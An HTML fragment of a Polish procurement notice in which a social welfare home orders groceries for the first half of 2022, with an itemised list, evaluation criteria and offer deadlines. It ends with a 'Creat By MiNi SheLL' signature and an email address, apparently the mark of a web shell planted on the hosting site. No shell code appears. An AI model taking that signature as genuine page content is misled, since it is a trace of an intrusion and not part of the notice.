90g	szt.	750<br/>9.	Brzoskwinia w syropie puszka 850g	szt.	5<br/>10.	Budyń bez cukru 500g różne smaki kg	15<br/>11.	Bułka tarta 500g	kg	150<br/>12.	Bułka tarta bezglutenowa 500g np. Belviten	kg	1<br/>13.	Chrupki kukurydziane 50g typu Flips	szt.	350<br/>14.	Chrupki ryżowe 75g	szt.	5<br/>15.	Chrzan delikatesowy Mosso 250g lub Laskol	szt.	250<br/>16.	Ciasteczka maślane b/cukru 125 g np. Jutrzenka	szt.	50<br/>17.	Ciasteczka owsiane bez cukru 150g np.. Ania szt.	100<br/>18.	Ciasteczka śniadaniowe b/ cukru Sante 50g – różne szt.	950<br/>19.	Ciastka korzenne lub miodowe lub pierniki toruńskie z polewą lub nadziewane	kg	5<br/>20.	Ciastka kruche z marmoladą, z polewą lukrową lub polewą czekoladową	kg	10<br/>21.	Ciastka maślane niskobiałkowe 150g	szt.	5<br/>22.	Ciastka w polewie czekoladowej biszkoptowe lub herbatniki	kg	5<br/>23.	Cieciorka konserwowa 400g	szt.	5<br/>24.	Cukier 1 kg	kg	2300<br/>25.	Cukier puder 400g	kg	5<br/>26.	Cukier waniliowy ok.30g	szt.	150<br/>27.	Cynamon 20g	szt.	25<br/>28.	Czosnek granulowany 20g	szt.	195<br/>29.	Ćwikła z chrzanem 300 g Laskol szt.	250<br/>30.	Dżem bez cukru na fruktozie(dla diabetyków) 200g szt.	175<br/>31.	Dżem owocowy na 1 osobę 25g szt.	1500<br/>32.	Fasola biała 400g drobna,średnia	kg	70<br/>33.	Fasola biała konserwowa 400 g	szt.	10<br/>34.	Fasola czerwona konserwowa 400g	szt.	100<br/>35.	Galaretka owocowa różne smaki 75g	szt.	700<br/>36.	Galaretka owocowa bez cukru 75g	szt.	200<br/>37.	Gałka muszkatołowa mielona 10 g	szt.	5<br/>38.	Gofry 250g(6 szt) np. Dane Cake	szt.	200<br/>39.	Gofry naturalne b/ cukru 65 g np.. Ania	szt.	100<br/>40.	Goździki 10 g	szt.	5<br/>41.	Groch połówki 400g	kg	80<br/>42.	Groszek konserwowy Kotlin 400g	szt.	250<br/>43.	Grześki truskawkowe,śmietankowe 26g bez polewy	szt.	900<br/>44.	Herbata czarna liściasta 100 g - Assam	szt.	600<br/>45.	Herbata czarna liściasta 100g Lipton	szt.	5<br/>46.	Herbatniki 50g typu Krakus, Szkolne	szt.	1500<br/>47.	Herbatniki Be-be 16 g	szt.	750<br/>48.	Herbatniki bez cukru 135g	szt.	150<br/>49.	Kakao 100g Wedel	szt.	70<br/>50.	Kasza gryczana prażona 1 kg	kg	70<br/>51.	Kasza jaglana	kg	20<br/>52.	Kasza jęczmienna 1 kg	kg	100<br/>53.	Kasza kus- kus	kg	10<br/>54.	Kasza manna 1 kg	kg	150<br/>55.	Kasza pęczak 1kg	kg	100<br/>56.	Kaszka ryżowa bezmleczna, kleik bez cukru 160 g	szt.	25<br/>57.	Kawa Inka 150g	szt.	500<br/>58.	Ketchup 500g łagodny Pudliszki	szt.	200<br/>59.	Kisiel 500g bez cukru różne smaki	szt.	100<br/>60.	Koncentrat barszcz czerwony Krakus 300ml	szt.	35<br/>61.	Koncentrat pomidorowy 30% 200g Dawton	szt.	25<br/>62.	Koncentrat pomidorowy 30% 900g MK	szt.	170<br/>63.	Koncentrat żurek Krakus 300ml	szt.	15<br/>64.	Kostki rosołowe 60g drobiowe,	szt.	1300<br/>65.	Kostki rosołowe wołowe 60 g	szt.	50<br/>66.	Kukurydza konserwowa Dafton 400g	szt.	240<br/>67.	Kwasek cytrynowy 20g	szt.	200<br/>68.	Liść laurowy 10g	szt.	200<br/>69.	Lu Petitki Lubisie różne 30g	szt.	500<br/>70.	Majeranek 15g	szt.	190<br/>71.	Majonez minimum 60% tłuszczu 900 ml Mosso	szt.	200<br/>72.	Makaron 1 kg &#34;Polskie Młyny&#34; 100% pszenicy durum	kg	170<br/>73.	Makaron 1 kg &#34;Polskie Młyny&#34; żytni	kg	15<br/>74.	Makaron 1kg Lubella 100% pszenicy durum różny	kg	200<br/>75.	Makaron bezglutenowy różny	kg	5<br/>76.	Mamutki – ciastka biszkoptowe b/cukru 20g	szt.	100<br/>77.	Marmolada wieloowocowa ,tradycyjna 1000 g	kg	2<br/>78.	Masa makowa z bakaliami 800-1000g	szt.	2<br/>79.	Mąka 1 kg typ 450 tortowa	kg	930<br/>80.	Mąka bezglutenowa uniwersalna	kg	3<br/>81.	Mąka kukurydziana	kg	3<br/>82.	Mąka ryżowa	kg	3<br/>83.	Mąka ziemniaczana 1 kg	kg	25<br/>84.	Mieszanka czekoladowa- cukierki w polewie z zawartością 22% czekolady	kg	5<br/>85.	Mieszanka owocowa, galaretka w cukrze	kg	5<br/>86.	Mini wafelki 150g	szt.	350<br/>87.	Miód naturalny 1 kg	szt.	50<br/>88.	Miód naturalny pszczeli na 1 osobę 25g	szt.	1850<br/>89.	Mleko niesłodzone zagęszczane 7,5% tłuszczu 500ml szt.	2<br/>90.	Morele suszone 200g	szt.	5<br/>91.	Musztarda 180g chrzanowa, miodowa, stołowa Rolewski-łagodna	szt.	350<br/>92.	Ocet 10% spirytusowy 0,5 l	szt.	50<br/>93.	Ogórki korniszony w słoikach 0,9 l.	szt.	400<br/>94.	Olej rzepakowy 100% 1L- rafinowany	szt.	1000<br/>95.	Orzechy włoskie 100g	szt.	5<br/>96.	Papryka ostra 20 g	szt.	25<br/>97.	Papryka słodka 20 g	szt.	75<br/>98.	Pestki słonecznika 200 szt	szt.	5<br/>99.	Pieczywa chrupki Sonko bez cukru 170 g - różne	szt.	35<br/>100.	Pieprz cytrynowy mielony 20g	szt.	50<br/>101.	Pieprz naturalny czarny 20g	szt.	170<br/>102.	Pieprz ziołowy 15g	szt.	300<br/>103.	Płatki jęczmienne błyskawiczne 500g	kg	150<br/>104.	Płatki kukurydziane bezglutenowe 500 g Nestle	szt.	5<br/>105.	Płatki migdałów 100 g	szt.	3<br/>106.	Płatki owsiane bez glutenowe 500 g	kg	2<br/>107.	Płatki owsiane zwykłe 500 g	kg	300<br/>108.	Płatki ryżowe 400 g	kg	150<br/>109.	Proszek do pieczenia 30 g	szt.	15<br/>110.	Przyprawa curry 20g	szt.	25<br/>111.	Przyprawa do flaków 20g	szt.	25<br/>112.	Przyprawa sucha Kucharek 1kg kg	150<br/>113.	Przyprawa w płynie 1L Winiary	szt.	35<br/>114.	Rodzynki 200g	kg	15<br/>115.	Ryż biały długoziarnisty 1 kg	kg	175<br/>116.	Słodzik Stewia – 200 tabletek	szt.	30<br/>117.	Słomka ptysiowa b/ cukru 30g	szt.	100<br/>118.	Soczek owocowo-warzywny 300 g bez cukru	szt.	650<br/>119.	Soczek owocowy 300g bez cukru szt.	750<br/>120.	Soczek owocowy bez cukru 200 ml	szt.	1650<br/>121.	Soczek warzywny pomidorowy bez cukru 300g	szt.	900<br/>122.	Soczek warzywny z buraka 300g bez cukru	szt.	750<br/>123.	Soczek wielowarzywny bez cukru 250 ml	szt.	150<br/>124.	Soczewica czerwona 350g	kg	40<br/>125.	Soda oczyszczona do celów spożywczych 50g	szt.	5<br/>126.	Sos czosnkowy np.Mosso 250 ml	szt.	200<br/>127.	Sos ogrodowy 700g Knor	szt.	5<br/>128.	Sos tatarski np.Mosso 260 ml	szt.	250<br/>129.	Sól 1kg różna	kg	270<br/>130.	Syrop owocowy 430ml Paola, Gellwe, Łowicz – porzeczka,wiśnia, malina,truskawka	szt.	420<br/>131.	Szczaw konserwowy 290g.Laskol	szt.	200<br/>132.	Śliwka kalifornijska 200g	szt.	5<br/>133.	Wafle bez cukru listki nyskie 38g	szt.	250<br/>134.	Wafle ryżowe 130 g typu Sonko	szt.	10<br/>135.	Wafle śmietankowe,orzechowe ,o smaku chałwy,z nadzieniem owocowym lub kisielu	kg	5<br/>136. Ziele angielskie 15g	szt.	170<br/>137.	Zioła prowansalskie 10g	szt.	10<br/>138.	Zupa ogonowa 500g Knorr	szt.	40<br/>139.	Żelatyna spożywcza zwykła wp. 50g	szt.	100<br/>140.	Herbata owocowa-np. Herbapol różne smaki 25 szt po 2 g	op.	100<br/>142.	Papryka konserwowa 720g	szt.	50<br/>143.	Pasztet białostocki z drobiem 100g	szt.	150<br/>144.	Szynka wieprzowa konserwowa -konserwa 110g	szt.	150<br/>145.	Żurawina suszona 200g	szt.	5<br/>145.	Śliwka w czekoladzie	kg	2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-21 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Dom Pomocy Społecznej, ul. Świerkowa 9</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-21 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com